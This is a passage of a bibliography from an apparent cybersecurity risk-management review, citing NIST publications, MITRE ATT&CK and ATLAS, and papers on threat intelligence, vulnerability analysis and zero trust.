MITRE. (2022, February 10). After SolarWinds, tamper proofing the cyber ecosystem. perma.cc/HNXS-7TY8

MITRE. (n.d.). MITRE ATLAS (Adversarial Threat Landscape for Artificial-Intelligence Systems) case studies. perma.cc/JX5S-LGEF

MITRE. (n.d.). MITRE ATT&CK. perma.cc/GWW8-NTCC

Mohanani, R., Salman, I., Turhan, B., Rodriguez, P., & Ralph, P. (2020). Cognitive biases in software engineering: A systematic mapping study. IEEE Transactions on Software Engineering, 46(12), 1318-1339. doi:10.1109/TSE.2018.2877759

National Institute of Standards and Technology [NIST]. (2011a). Managing information security risk: Organization, mission, and information system view. NIST Special Publication 800-39. doi.org/10.6028/NIST.SP.800-39

NIST. (2012b). Guide for conducting risk assessments. NIST Special Publication 800-30.

NIST. (2016c). Cyber supply chain risk management. perma.cc/WSLD-R7Q7

NIST. (2021d). Operational technology security. NIST Computer Security Resource Center (CSRC). perma.cc/T9CB-SAFE

NIST. (n.d.). Attack surface. Glossary | CSRC. perma.cc/92GL-KU27

Parkinson, S., Crampton, A., & Hill, R. (2018). Guide to vulnerability analysis for computer networks and systems: An artificial intelligence approach [Springer Computer Communications and Networks series (CCN)]. doi.org/10.1007/978-3-319-92624-7

PCI Pal. (2019, September 17) [Press release]. New global research shows poor data security practices have serious consequences for businesses worldwide. perma.cc/YL3K-96BN

Rose, S., Borchert, O., Mitchell, S., & Connelly, S. (2020). Zero trust architecture. NIST Special Publication 800-207. doi.org/10.6028/NIST.SP.800-207

Roy, S., Sharmin, N., Acosta, J. C., Kiekintveld, C., & Laszka, A. (2022). Survey and taxonomy of adversarial reconnaissance techniques. ACM Computing Surveys. doi.org/10.1145/3538704

Sargent, J. (2022, February 16). Security perimeter is no more as attack surface continues to expand. SD Times. perma.cc/2PSY-8K4F

Schaberreiter, T., Kupfersberger, V., Rantos, K., Spyros, A., Papanikolaou, A., Ilioudis, C., & Quirchmayr, G. (2019). A quantitative evaluation of trust in the quality of cyber threat intelligence sources. Proceedings of the 14th International Conference on Availability, Reliability and Security. doi.org/10.1145/3339252.3342112

Schlette, D., Caselli, M., & Pernul, G. (2021). A comparative study on cyber threat intelligence: The security incident response perspective. IEEE Communications Surveys & Tutorials, 23(4), 2525-2556. doi.org/10.1109/COMST.2021

Shankar, R., Kumar, S., & Johnson, A. (2020, October 22). Cyberattacks against machine learning systems are more common than you think [Blog post]. perma.cc/PQW. 'ADE

Shoard, P., & Handa, S. (2021). Hype Cycle for Security Operations, 2021 (ID No. G00747546). Gartner. perma.cc/6XBU-LPEF

Shreeve, B., Hallett, J., Edwards, M., Anthonysamy, P., Frey, S., & Rashid, A. (2021). "So if Mr Blue Head here clicks the link...": Risk thinking in cyber security decision making. ACM Transactions on Privacy and Security, 24(1), 1-29. doi.org/10.1145/3419101

Siddaway, A. P., Wood, A. M., & Hedges, L. V. (2019). How to do a systematic review: A best practice guide for conducting and reporting narrative reviews, meta-analyses, and meta-syntheses. Annual Review of Psychology, 70, 747-770. doi.org/10.1146/annurev-psych-010418-102803

Silver, G. (2021, April 26). Managing cybersecurity risk: Four options for CEOs, CFOs, and risk officers. Forbes Technology Council. perma.cc/V2CF-ZXUK

Smith, G. S. (2022). The new normal in IT: How the global pandemic changed information technology forever. Wiley.

Souppaya, M., & Scarfone, K. (2022). Guide to enterprise patch management planning: Preventive maintenance for technology. NIST Special Publication 800-40, Rev. 4. doi.org/10.6028/NIST.SP.800-40r4

Spring, J., Hatleback, E., Householder, A., Manion, A., & Shick, D. (2021). Time to change the CVSS? IEEE Security & Privacy, 19(2), 74-78. doi:10.1109/MSEC.2020.3044475

Spring, J. M. (2022). An analysis of how many undiscovered vulnerabilities remain in information systems. perma.cc/X8HF-3A83

Stine, K. M., Quinn, S. D., Ivy, N., Feldman, L., Witte, G. A., & Gardner, R. (2020). Identifying and estimating cybersecurity risk for enterprise risk management (ERM). NISTIR 8286. doi.org/10.6028/NIST.IR.8286

Stine, K. M., Quinn, S. D., Ivy, N., Barrett, M., Feldman, L., Witte, G. A., & Gardner, R. (2021). Identifying and estimating cybersecurity risk for enterprise risk management (ERM). NISTIR 8286A. doi.org/10.6028/NIST.IR.8286A

The Open Group. (2021). Zero trust commandments ("Open Group"). perma.cc/M2UQ-AZGS

Wang, Y., Zhou, N. Z., Zhang, N., Liu, D., Xing, R., Luan, T. H., & Shen, X. (2022, April 8). A survey on Metaverse: Fundamentals, security, and privacy. doi.org/10.48550/arXiv.2203.02662

The White House. (2021, October 1). Statement by President Joe Biden on Cybersecurity Awareness Month. perma.cc/77NB-S4YW

Wilburn, D., & Schmidt, C. (2022, March 15). Log4shell and endemic vulnerabilities in open-source libraries. perma.cc/M7BL-Q7GY

Yale, N., & Zonghao, Y. (2021, January 18). Backdoor attack on deep learning models in mobile apps. perma.cc/X27Q-62CZ

Yeboah-Ofori, A., et al. (2021). Cyber threat predictive analytics for improving cyber supply chain security. IEEE Access, 9, 94318-94337. doi.org/10.1109/ACCESS.2021.3087109

Yin, Z., Xu, Y., Ma, F., Gao, H., Qiao, L., & Jiang, Y. (2022). Scanner++: Enhanced vulnerability detection of web applications with attack intent synchronization. ACM Transactions on Software Engineering and Methodology. doi.org/10.1145/3517036

Zbakh, M., Elmahdi, K., Cherkaoui, R., & Enniari, S. (2015). A multi-criteria analysis of intrusion detection architectures in cloud environments. 2015 International Conference on Cloud Technologies and Applications (CloudTech). doi.org/10.1109/cloudtech.2015.7336967
